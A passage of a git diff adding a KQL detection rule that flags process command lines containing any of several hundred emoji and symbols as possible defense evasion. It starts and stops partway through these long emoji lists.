contains "🔅" or ProcessCommandLine contains "🔆" or ProcessCommandLine contains "〽️" or ProcessCommandLine contains "⚠️" or ProcessCommandLine contains "🚸" or ProcessCommandLine contains "🔱" or ProcessCommandLine contains "⚜️" or ProcessCommandLine contains "🔰" or ProcessCommandLine contains "♻️" or ProcessCommandLine contains "✅" or ProcessCommandLine contains "🈯️" or ProcessCommandLine contains "💹" or ProcessCommandLine contains "❇️" or ProcessCommandLine contains "✳️" or ProcessCommandLine contains "❎" or ProcessCommandLine contains "🌐" or ProcessCommandLine contains "💠" or ProcessCommandLine contains "Ⓜ️" or ProcessCommandLine contains "🌀" or ProcessCommandLine contains "💤" or ProcessCommandLine contains "🏧" or ProcessCommandLine contains "🚾" or ProcessCommandLine contains "♿️" or ProcessCommandLine contains "🅿️" or ProcessCommandLine contains "🛗" or ProcessCommandLine contains "🈳" or ProcessCommandLine contains "🈂️" or ProcessCommandLine contains "🛂" or ProcessCommandLine contains "🛃" or ProcessCommandLine contains "🛄" or ProcessCommandLine contains "🛅" or ProcessCommandLine contains "🚹" or ProcessCommandLine contains "🚺" or ProcessCommandLine contains "🚼" or ProcessCommandLine contains "⚧" or ProcessCommandLine contains "🚻" or ProcessCommandLine contains "🚮" or ProcessCommandLine contains "🎦" or ProcessCommandLine contains "📶" or ProcessCommandLine contains "🈁" or ProcessCommandLine contains "🔣" or ProcessCommandLine contains "ℹ️" or ProcessCommandLine contains "🔤" or ProcessCommandLine contains "🔡" or ProcessCommandLine contains "🔠" or ProcessCommandLine contains "🆖" or ProcessCommandLine contains "🆗" or ProcessCommandLine contains "🆙" or ProcessCommandLine contains "🆒" or ProcessCommandLine contains "🆕" or ProcessCommandLine contains "🆓" or ProcessCommandLine contains "0️⃣" or ProcessCommandLine contains "1️⃣" or ProcessCommandLine contains "2️⃣" or ProcessCommandLine contains "3️⃣" or ProcessCommandLine contains "4️⃣" or ProcessCommandLine contains "5️⃣" or ProcessCommandLine contains "6️⃣" or ProcessCommandLine contains "7️⃣" or ProcessCommandLine contains "8️⃣" or ProcessCommandLine contains "9️⃣" or ProcessCommandLine contains "🔟" or ProcessCommandLine contains "🔢" or ProcessCommandLine contains "#️⃣" or ProcessCommandLine contains "️⃣" or ProcessCommandLine contains "⏏️" or ProcessCommandLine contains "▶️" or ProcessCommandLine contains "⏸" or ProcessCommandLine contains "⏯" or ProcessCommandLine contains "⏹" or ProcessCommandLine contains "⏺" or ProcessCommandLine contains "⏭" or ProcessCommandLine contains "⏮" or ProcessCommandLine contains "⏩" or ProcessCommandLine contains "⏪" or ProcessCommandLine contains "⏫" or ProcessCommandLine contains "⏬" or ProcessCommandLine contains "◀️" or ProcessCommandLine contains "🔼" or ProcessCommandLine contains "🔽" or ProcessCommandLine contains "➡️" or ProcessCommandLine contains "⬅️" or ProcessCommandLine contains "⬆️" or ProcessCommandLine contains "⬇️" or ProcessCommandLine contains "↗️" or ProcessCommandLine contains "↘️" or ProcessCommandLine contains "↙️" or ProcessCommandLine contains "↖️" or ProcessCommandLine contains "↕️" or ProcessCommandLine contains "↔️" or ProcessCommandLine contains "↪️" or ProcessCommandLine contains "↩️" or ProcessCommandLine contains "⤴️" or ProcessCommandLine contains "⤵️" or ProcessCommandLine contains "🔀" or ProcessCommandLine contains "🔁" or ProcessCommandLine contains "🔂" or ProcessCommandLine contains "🔄" or ProcessCommandLine contains "🔃" or ProcessCommandLine contains "🎵" or ProcessCommandLine contains "🎶" or ProcessCommandLine contains "➕" or ProcessCommandLine contains "➖" or ProcessCommandLine contains "➗" or ProcessCommandLine contains "✖️" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "♾" or ProcessCommandLine contains "💲" or ProcessCommandLine contains "💱" or ProcessCommandLine contains "™️" or ProcessCommandLine contains "©️" or ProcessCommandLine contains "®️" or ProcessCommandLine contains "〰️" or ProcessCommandLine contains "➰" or ProcessCommandLine contains "➿" or ProcessCommandLine contains "🔚" or ProcessCommandLine contains "🔙" or ProcessCommandLine contains "🔛" or ProcessCommandLine contains "🔝" or ProcessCommandLine contains "🔜" or ProcessCommandLine contains "✔️" or ProcessCommandLine contains "☑️" or ProcessCommandLine contains "🔘" or ProcessCommandLine contains "🔴" or ProcessCommandLine contains "🟠" or ProcessCommandLine contains "🟡" or ProcessCommandLine contains "🟢" or ProcessCommandLine contains "🔵" or ProcessCommandLine contains "🟣" or ProcessCommandLine contains "⚫️" or ProcessCommandLine contains "⚪️" or ProcessCommandLine contains "🟤" or ProcessCommandLine contains "🔺" or ProcessCommandLine contains "🔻" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql new file mode 100644 index 00000000..b8cabf92 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_4.kql @@ -0,0 +1,10 @@ +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "🔸" or ProcessCommandLine contains "🔹" or ProcessCommandLine contains "🔶" or ProcessCommandLine contains "🔷" or ProcessCommandLine contains "🔳" or ProcessCommandLine contains "🔲" or ProcessCommandLine contains "▪️" or ProcessCommandLine contains "▫️" or ProcessCommandLine contains "◾️" or ProcessCommandLine contains "◽️" or ProcessCommandLine contains "◼️" or ProcessCommandLine contains "◻️" or ProcessCommandLine contains "🟥" or ProcessCommandLine contains "🟧" or ProcessCommandLine contains "🟨" or ProcessCommandLine contains "🟩" or ProcessCommandLine contains "🟦" or ProcessCommandLine contains "🟪" or ProcessCommandLine contains "⬛️" or ProcessCommandLine contains "⬜️" or ProcessCommandLine contains "🟫" or ProcessCommandLine contains "🔈" or ProcessCommandLine contains "🔇" or ProcessCommandLine contains "🔉" or ProcessCommandLine contains "🔊" or ProcessCommandLine contains "🔔" or ProcessCommandLine contains "🔕" or ProcessCommandLine contains "📣" or ProcessCommandLine contains "📢" or ProcessCommandLine contains "👁‍🗨" or ProcessCommandLine contains "💬" or ProcessCommandLine contains "💭" or ProcessCommandLine contains "🗯" or ProcessCommandLine contains "♠️" or ProcessCommandLine contains "♣️" or ProcessCommandLine contains "♥️" or ProcessCommandLine contains "♦️" or ProcessCommandLine contains "🃏" or ProcessCommandLine contains "🎴" or ProcessCommandLine contains "🀄️" or ProcessCommandLine contains "🕐" or ProcessCommandLine contains "🕑" or ProcessCommandLine contains "🕒" or ProcessCommandLine contains "🕓" or ProcessCommandLine contains "🕔" or ProcessCommandLine contains "🕕" or ProcessCommandLine contains "🕖" or ProcessCommandLine contains "🕗" or ProcessCommandLine contains "🕘" or ProcessCommandLine contains "🕙" or ProcessCommandLine contains "🕚" or ProcessCommandLine contains "🕛" or ProcessCommandLine contains "🕜" or ProcessCommandLine contains "🕝" or ProcessCommandLine contains "🕞" or ProcessCommandLine contains "🕟" or ProcessCommandLine contains "🕠" or ProcessCommandLine contains "🕡" or ProcessCommandLine contains "🕢" or ProcessCommandLine contains "🕣" or ProcessCommandLine contains "🕤" or ProcessCommandLine contains "🕥" or ProcessCommandLine contains "🕦" or ProcessCommandLine contains "🕧✢" or ProcessCommandLine contains "✣" or ProcessCommandLine contains "✤" or ProcessCommandLine contains "✥" or ProcessCommandLine contains "✦" or ProcessCommandLine contains "✧" or ProcessCommandLine contains "★" or ProcessCommandLine contains "☆" or ProcessCommandLine contains "✯" or ProcessCommandLine contains "✡︎" or ProcessCommandLine contains "✩" or ProcessCommandLine contains "✪" or ProcessCommandLine contains "✫" or ProcessCommandLine contains "✬" or ProcessCommandLine contains "✭" or ProcessCommandLine contains "✮" or ProcessCommandLine contains "✶" or ProcessCommandLine contains "✷" or ProcessCommandLine contains "✵" or ProcessCommandLine contains "✸" or ProcessCommandLine contains "✹" or ProcessCommandLine contains "→" or ProcessCommandLine contains "⇒" or ProcessCommandLine contains "⟹" or ProcessCommandLine contains "⇨" or ProcessCommandLine contains "⇾" or ProcessCommandLine contains "➾" or ProcessCommandLine contains "⇢" or ProcessCommandLine contains "☛" or ProcessCommandLine contains "☞" or ProcessCommandLine contains "➔" or ProcessCommandLine contains "➜" or ProcessCommandLine contains "➙" or ProcessCommandLine contains "➛" or ProcessCommandLine contains "➝" or ProcessCommandLine contains "➞" or ProcessCommandLine contains "♠︎" or ProcessCommandLine contains "♣︎" or ProcessCommandLine contains "♥︎" or ProcessCommandLine contains "♦︎" or ProcessCommandLine contains "♤" or ProcessCommandLine contains "♧" or ProcessCommandLine contains "♡" or ProcessCommandLine contains "♢" or ProcessCommandLine contains "♚" or ProcessCommandLine contains "♛" or ProcessCommandLine contains "♜" or ProcessCommandLine contains "♝" or ProcessCommandLine contains "♞" or ProcessCommandLine contains "♟" or ProcessCommandLine contains "♔" or ProcessCommandLine contains "♕" or ProcessCommandLine contains "♖" or ProcessCommandLine contains "♗" or ProcessCommandLine contains "♘" or ProcessCommandLine contains "♙" or ProcessCommandLine contains "⚀" or ProcessCommandLine contains "⚁" or ProcessCommandLine contains "⚂" or ProcessCommandLine contains "⚃" or ProcessCommandLine contains "⚄" or ProcessCommandLine contains "⚅" or ProcessCommandLine contains "🂠" or ProcessCommandLine contains "⚈" or ProcessCommandLine contains "⚉" or ProcessCommandLine contains "⚆" or ProcessCommandLine contains "⚇" or ProcessCommandLine contains "𓀀" or ProcessCommandLine contains "𓀁" or ProcessCommandLine contains "𓀂" or ProcessCommandLine contains "𓀃" or ProcessCommandLine contains "𓀄" or ProcessCommandLine contains "𓀅" or ProcessCommandLine contains "𓀆" or ProcessCommandLine contains "𓀇" or ProcessCommandLine contains "𓀈" or ProcessCommandLine contains "𓀉" or ProcessCommandLine contains "𓀊" or ProcessCommandLine contains "𓀋" or ProcessCommandLine contains "𓀌" or ProcessCommandLine contains "𓀍" or ProcessCommandLine contains "𓀎" or ProcessCommandLine contains "𓀏" or ProcessCommandLine contains "𓀐" or ProcessCommandLine contains "𓀑" or ProcessCommandLine contains "𓀒" or ProcessCommandLine contains "𓀓" or ProcessCommandLine contains "𓀔" or ProcessCommandLine contains "𓀕" or ProcessCommandLine contains "𓀖" or ProcessCommandLine contains "𓀗" or ProcessCommandLine contains "𓀘" or ProcessCommandLine contains "𓀙" or ProcessCommandLine contains "𓀚" or ProcessCommandLine contains "𓀛" or ProcessCommandLine contains "𓀜" or ProcessCommandLine contains "𓀝🏳️" or ProcessCommandLine contains "🏴" or ProcessCommandLine contains "🏁" or ProcessCommandLine contains "🚩" or ProcessCommandLine contains "🏳️‍🌈" or ProcessCommandLine contains "🏳️‍⚧️" or ProcessCommandLine contains "🏴‍☠️" or ProcessCommandLine contains "🇦🇫" or ProcessCommandLine contains "🇦🇽" or ProcessCommandLine contains "🇦🇱" or ProcessCommandLine contains "🇩🇿" or ProcessCommandLine contains "🇦🇸" or ProcessCommandLine contains "🇦🇩" or ProcessCommandLine contains "🇦🇴" or ProcessCommandLine contains "🇦🇮" or ProcessCommandLine contains "🇦🇶" or ProcessCommandLine contains "🇦🇬" or ProcessCommandLine contains "🇦🇷" or ProcessCommandLine contains "🇦🇲" or ProcessCommandLine contains "🇦🇼" or ProcessCommandLine contains "🇦🇺" or ProcessCommandLine contains "🇦🇹" or ProcessCommandLine contains "🇦🇿" or ProcessCommandLine contains "🇧🇸" or ProcessCommandLine contains "🇧🇭" or ProcessCommandLine contains "🇧🇩" or ProcessCommandLine contains "🇧🇧" or ProcessCommandLine contains "🇧🇾" or ProcessCommandLine contains "🇧🇪" or ProcessCommandLine contains "🇧🇿" or ProcessCommandLine contains "🇧🇯" or ProcessCommandLine contains "🇧🇲" or ProcessCommandLine contains "🇧🇹" or ProcessCommandLine contains "🇧🇴" or ProcessCommandLine contains "🇧🇦" or ProcessCommandLine contains "🇧🇼" or ProcessCommandLine contains "🇧🇷" or ProcessCommandLine contains "🇮🇴" or ProcessCommandLine contains "🇻🇬" or ProcessCommandLine contains "🇧🇳" or ProcessCommandLine contains "🇧🇬" or ProcessCommandLine contains "🇧🇫" or ProcessCommandLine contains "🇧🇮" or ProcessCommandLine contains "🇰🇭" or ProcessCommandLine contains "🇨🇲" or ProcessCommandLine contains "🇨🇦" or ProcessCommandLine contains "🇮🇨" or ProcessCommandLine contains "🇨🇻" or ProcessCommandLine contains "🇧🇶" or ProcessCommandLine contains "🇰🇾" or ProcessCommandLine contains "🇨🇫" or ProcessCommandLine contains "🇹🇩" or ProcessCommandLine contains "🇨🇱" or ProcessCommandLine contains "🇨🇳" or ProcessCommandLine contains "🇨🇽" or ProcessCommandLine contains "🇨🇨" or ProcessCommandLine contains "🇨🇴" or ProcessCommandLine contains "🇰🇲" or ProcessCommandLine contains "🇨🇬" or ProcessCommandLine contains "🇨🇩" or ProcessCommandLine contains "🇨🇰" or ProcessCommandLine contains "🇨🇷" or ProcessCommandLine contains "🇨🇮" or ProcessCommandLine contains "🇭🇷" or ProcessCommandLine contains "🇨🇺" or ProcessCommandLine contains "🇨🇼" or ProcessCommandLine contains "🇨🇾" or ProcessCommandLine contains "🇨🇿" or ProcessCommandLine contains "🇩🇰" or ProcessCommandLine contains "🇩🇯" or ProcessCommandLine contains "🇩🇲" or ProcessCommandLine contains "🇩🇴" or ProcessCommandLine contains "🇪🇨" or ProcessCommandLine contains "🇪🇬" or ProcessCommandLine contains "🇸🇻" or ProcessCommandLine contains "🇬🇶" or ProcessCommandLine contains "🇪🇷" or ProcessCommandLine contains "🇪🇪" or ProcessCommandLine contains "🇪🇹" or ProcessCommandLine contains "🇪🇺" or ProcessCommandLine contains "🇫🇰" or ProcessCommandLine contains "🇫🇴" or ProcessCommandLine contains "🇫🇯" or ProcessCommandLine contains "🇫🇮" or ProcessCommandLine contains "🇫🇷" or ProcessCommandLine contains "🇬🇫" or ProcessCommandLine contains "🇵🇫" or ProcessCommandLine contains "🇹🇫" or ProcessCommandLine contains "🇬🇦" or ProcessCommandLine contains "🇬🇲" or ProcessCommandLine contains "🇬🇪" or ProcessCommandLine contains "🇩🇪" or ProcessCommandLine contains "🇬🇭" or ProcessCommandLine contains "🇬🇮" or ProcessCommandLine contains "🇬🇷" or ProcessCommandLine contains "🇬🇱" or ProcessCommandLine contains "🇬🇩" or ProcessCommandLine contains "🇬🇵" or ProcessCommandLine contains "🇬🇺" or ProcessCommandLine contains "🇬🇹" or ProcessCommandLine contains "🇬🇬" or ProcessCommandLine contains "🇬🇳" or ProcessCommandLine contains "🇬🇼" or ProcessCommandLine contains "🇬🇾" or ProcessCommandLine contains "🇭🇹" or ProcessCommandLine contains "🇭🇳" or ProcessCommandLine contains "🇭🇰" or ProcessCommandLine contains "🇭🇺" or ProcessCommandLine contains "🇮🇸" or ProcessCommandLine contains "🇮🇳" or ProcessCommandLine contains "🇮🇩" or ProcessCommandLine contains "🇮🇷" or ProcessCommandLine contains "🇮🇶" or ProcessCommandLine contains "🇮🇪" or ProcessCommandLine contains "🇮🇲" or ProcessCommandLine contains "🇮🇱" or ProcessCommandLine contains "🇮🇹" or ProcessCommandLine contains "🇯🇲" or ProcessCommandLine contains "🇯🇵" or ProcessCommandLine contains "🎌" or ProcessCommandLine contains "🇯🇪" or ProcessCommandLine contains "🇯🇴" or ProcessCommandLine contains "🇰🇿" or ProcessCommandLine contains "🇰🇪" or ProcessCommandLine contains "🇰🇮" or ProcessCommandLine contains "🇽🇰" or ProcessCommandLine contains "🇰🇼" or ProcessCommandLine contains "🇰🇬" or ProcessCommandLine contains "🇱🇦" or ProcessCommandLine contains "🇱🇻" or ProcessCommandLine contains "🇱🇧" or ProcessCommandLine contains "🇱🇸" or ProcessCommandLine contains "🇱🇷" or ProcessCommandLine contains "🇱🇾" or ProcessCommandLine contains "🇱🇮" or ProcessCommandLine contains "🇱🇹" or ProcessCommandLine contains "🇱🇺" or ProcessCommandLine contains "🇲🇴" or ProcessCommandLine contains "🇲🇰" or ProcessCommandLine contains "🇲🇬" or ProcessCommandLine contains "🇲🇼" or ProcessCommandLine contains "🇲🇾" or ProcessCommandLine contains "🇲🇻" or ProcessCommandLine contains "🇲🇱" or ProcessCommandLine contains "🇲🇹" or ProcessCommandLine contains "🇲🇭" or ProcessCommandLine contains "🇲🇶" or ProcessCommandLine contains "🇲🇷" or ProcessCommandLine contains "🇲🇺" or ProcessCommandLine contains "🇾🇹" or ProcessCommandLine contains "🇲🇽" or ProcessCommandLine contains "🇫🇲" or ProcessCommandLine contains "🇲🇩" or ProcessCommandLine contains "🇲🇨" or ProcessCommandLine contains "🇲🇳" or ProcessCommandLine contains "🇲🇪" or ProcessCommandLine contains "🇲🇸" or ProcessCommandLine contains "🇲🇦" or ProcessCommandLine contains "🇲🇿" or ProcessCommandLine contains "🇲🇲" or ProcessCommandLine contains "🇳🇦" or ProcessCommandLine contains "🇳🇷" or ProcessCommandLine contains "🇳🇵" or ProcessCommandLine contains "🇳🇱" or ProcessCommandLine contains "🇳🇨" or ProcessCommandLine contains "🇳🇿" or ProcessCommandLine contains "🇳🇮" or ProcessCommandLine contains "🇳🇪" or ProcessCommandLine contains "🇳🇬" or ProcessCommandLine contains "🇳🇺" or ProcessCommandLine contains "🇳🇫" or ProcessCommandLine contains "🇰🇵" or ProcessCommandLine contains "🇲🇵" or ProcessCommandLine contains "🇳🇴" or ProcessCommandLine contains "🇴🇲" or ProcessCommandLine contains "🇵🇰" or ProcessCommandLine contains "🇵🇼" or ProcessCommandLine contains "🇵🇸" or ProcessCommandLine contains "🇵🇦" or ProcessCommandLine contains "🇵🇬" or ProcessCommandLine contains "🇵🇾" or ProcessCommandLine contains "🇵🇪" or ProcessCommandLine contains "🇵🇭" or ProcessCommandLine contains "🇵🇳" or ProcessCommandLine contains "🇵🇱" or ProcessCommandLine contains "🇵🇹" or ProcessCommandLine contains "🇵🇷" or ProcessCommandLine contains "🇶🇦" or ProcessCommandLine contains "🇷🇪" or ProcessCommandLine contains "🇷🇴" or ProcessCommandLine contains "🇷🇺" or ProcessCommandLine contains "🇷🇼" or ProcessCommandLine contains "🇼🇸" or ProcessCommandLine contains "🇸🇲" or ProcessCommandLine contains "🇸🇦" or ProcessCommandLine contains "🇸🇳" or ProcessCommandLine contains "🇷🇸" or ProcessCommandLine contains "🇸🇨" or ProcessCommandLine contains "🇸🇱" or ProcessCommandLine contains "🇸🇬" or ProcessCommandLine contains "🇸🇽" or ProcessCommandLine contains "🇸🇰" or ProcessCommandLine contains "🇸🇮" or ProcessCommandLine contains "🇬🇸" or ProcessCommandLine contains "🇸🇧" or ProcessCommandLine contains "🇸🇴" or ProcessCommandLine contains "🇿🇦" or ProcessCommandLine contains "🇰🇷" or ProcessCommandLine contains "🇸🇸" or ProcessCommandLine contains "🇪🇸" or ProcessCommandLine contains "🇱🇰" or ProcessCommandLine contains "🇧🇱" or ProcessCommandLine contains "🇸🇭" or ProcessCommandLine contains "🇰🇳" or ProcessCommandLine contains "🇱🇨" or ProcessCommandLine contains "🇵🇲" or ProcessCommandLine contains "🇻🇨" or ProcessCommandLine contains "🇸🇩" or ProcessCommandLine contains "🇸🇷" or ProcessCommandLine contains "🇸🇿" or ProcessCommandLine contains "🇸🇪" or ProcessCommandLine contains "🇨🇭" or ProcessCommandLine contains "🇸🇾" or ProcessCommandLine contains "🇹🇼" or ProcessCommandLine contains "🇹🇯" or ProcessCommandLine contains "🇹🇿" or ProcessCommandLine contains "🇹🇭" or ProcessCommandLine contains "🇹🇱" or ProcessCommandLine contains "🇹🇬" or ProcessCommandLine contains "🇹🇰" or ProcessCommandLine contains "🇹🇴" or ProcessCommandLine contains "🇹🇹" or ProcessCommandLine contains "🇹🇳" or ProcessCommandLine contains "🇹🇷" or ProcessCommandLine contains "🇹🇲" or ProcessCommandLine contains "🇹🇨" or ProcessCommandLine contains "🇹🇻" or ProcessCommandLine contains "🇻🇮" or ProcessCommandLine contains "🇺🇬" or ProcessCommandLine contains "🇺🇦" or ProcessCommandLine contains "🇦🇪" or ProcessCommandLine contains "🇬🇧" or ProcessCommandLine contains "🏴󠁧󠁢󠁥󠁮󠁧󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁳󠁣󠁴󠁿" or ProcessCommandLine contains "🏴󠁧󠁢󠁷󠁬󠁳󠁿" or ProcessCommandLine contains "🇺🇳" or ProcessCommandLine contains "🇺🇸" or ProcessCommandLine contains "🇺🇾" or ProcessCommandLine contains "🇺🇿" or ProcessCommandLine contains "🇻🇺" or ProcessCommandLine contains "🇻🇦" or ProcessCommandLine contains "🇻🇪" or ProcessCommandLine contains "🇻🇳" or ProcessCommandLine contains "🇼🇫" or ProcessCommandLine contains "🇪🇭" or ProcessCommandLine contains "🇾🇪" or ProcessCommandLine contains "🇿🇲" or ProcessCommandLine contains "🇿🇼🫠" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🫤" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫱🏼" or ProcessCommandLine contains "🫱🏽" or ProcessCommandLine contains "🫱🏾" or ProcessCommandLine contains "🫱🏿" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫲🏼" or ProcessCommandLine contains "🫲🏽" or ProcessCommandLine contains "🫲🏾" or ProcessCommandLine contains "🫲🏿" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫳🏼" or ProcessCommandLine contains "🫳🏽" or ProcessCommandLine contains "🫳🏾" or ProcessCommandLine contains "🫳🏿" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "🫴🏼" or ProcessCommandLine contains "🫴🏽" or ProcessCommandLine contains "🫴🏾" or ProcessCommandLine contains "🫴🏿" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🫰🏼" or ProcessCommandLine contains "🫰🏽" or ProcessCommandLine contains "🫰🏾" or ProcessCommandLine contains "🫰🏿" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫵🏼" or ProcessCommandLine contains "🫵🏽" or ProcessCommandLine contains "🫵🏾" or ProcessCommandLine contains "🫵🏿" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🫶🏼" or ProcessCommandLine contains "🫶🏽" or ProcessCommandLine contains "🫶🏾" or ProcessCommandLine contains "🫶🏿" or ProcessCommandLine contains "🤝🏻" or ProcessCommandLine contains "🤝🏼" or ProcessCommandLine contains "🤝🏽" or ProcessCommandLine contains "🤝🏾" or ProcessCommandLine contains "🤝🏿" or ProcessCommandLine contains "🫱🏻‍🫲🏼" or ProcessCommandLine contains "🫱🏻‍🫲🏽" or ProcessCommandLine contains "🫱🏻‍🫲🏾" or ProcessCommandLine contains "🫱🏻‍🫲🏿" or ProcessCommandLine contains "🫱🏼‍🫲🏻" or ProcessCommandLine contains "🫱🏼‍🫲🏽" or ProcessCommandLine contains "🫱🏼‍🫲🏾" or ProcessCommandLine contains "🫱🏼‍🫲🏿" or ProcessCommandLine contains "🫱🏽‍🫲🏻" or ProcessCommandLine contains "🫱🏽‍🫲🏼" or ProcessCommandLine contains "🫱🏽‍🫲🏾" or ProcessCommandLine contains "🫱🏽‍🫲🏿" or ProcessCommandLine contains "🫱🏾‍🫲🏻" or ProcessCommandLine contains "🫱🏾‍🫲🏼" or ProcessCommandLine contains "🫱🏾‍🫲🏽" or ProcessCommandLine contains "🫱🏾‍🫲🏿" or ProcessCommandLine contains "🫱🏿‍🫲🏻" or ProcessCommandLine contains "🫱🏿‍🫲🏼" or ProcessCommandLine contains "🫱🏿‍🫲🏽" or ProcessCommandLine contains "🫱🏿‍🫲🏾" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🫅🏼" or ProcessCommandLine contains "🫅🏽" or ProcessCommandLine contains "🫅🏾" or ProcessCommandLine contains "🫅🏿" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🫃🏼" or ProcessCommandLine contains "🫃🏽" or ProcessCommandLine contains "🫃🏾" or ProcessCommandLine contains "🫃🏿" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫄🏼" or ProcessCommandLine contains "🫄🏽" or ProcessCommandLine contains "🫄🏾" or ProcessCommandLine contains "🫄🏿" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "🪸" or ProcessCommandLine contains "🪷" or ProcessCommandLine contains "🪹" or ProcessCommandLine contains "🪺" or ProcessCommandLine contains "🫘" or ProcessCommandLine contains "🫗" or ProcessCommandLine contains "🫙" or ProcessCommandLine contains "🛝" or ProcessCommandLine contains "🛞" or ProcessCommandLine contains "🛟" or ProcessCommandLine contains "🪬" or ProcessCommandLine contains "🪩" or ProcessCommandLine contains "🪫" or ProcessCommandLine contains "🩼" or ProcessCommandLine contains "🩻" or ProcessCommandLine contains "🫧" or ProcessCommandLine contains "🪪" or ProcessCommandLine contains "🟰" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "❤️‍🔥" or ProcessCommandLine contains "❤️‍🩹" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏼‍♀️" or ProcessCommandLine contains "🧔🏽‍♀️" or ProcessCommandLine contains "🧔🏾‍♀️" or ProcessCommandLine contains "🧔🏿‍♀️" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "🧔🏼‍♂️" or ProcessCommandLine contains "🧔🏽‍♂️" or ProcessCommandLine contains "🧔🏾‍♂️" or ProcessCommandLine contains "🧔🏿‍♂️" or ProcessCommandLine contains "💑🏻" or ProcessCommandLine contains "💑🏼" or ProcessCommandLine contains "💑🏽" or ProcessCommandLine contains "💑🏾" or ProcessCommandLine contains "💑🏿" or ProcessCommandLine contains "💏🏻" or ProcessCommandLine contains "💏🏼" or ProcessCommandLine contains "💏🏽" or ProcessCommandLine contains "💏🏾" or ProcessCommandLine contains "💏🏿" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏽‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏾‍❤️‍👨🏿" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏻" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏼" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏽" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏾" or ProcessCommandLine contains "👨🏿‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏻‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👨🏿" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏻" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏼" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏽" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏾" or ProcessCommandLine contains "👩🏼‍❤️‍👩🏿" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏻" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏼" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏽" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏾" or ProcessCommandLine contains "👩🏽‍❤️‍👨🏿" or 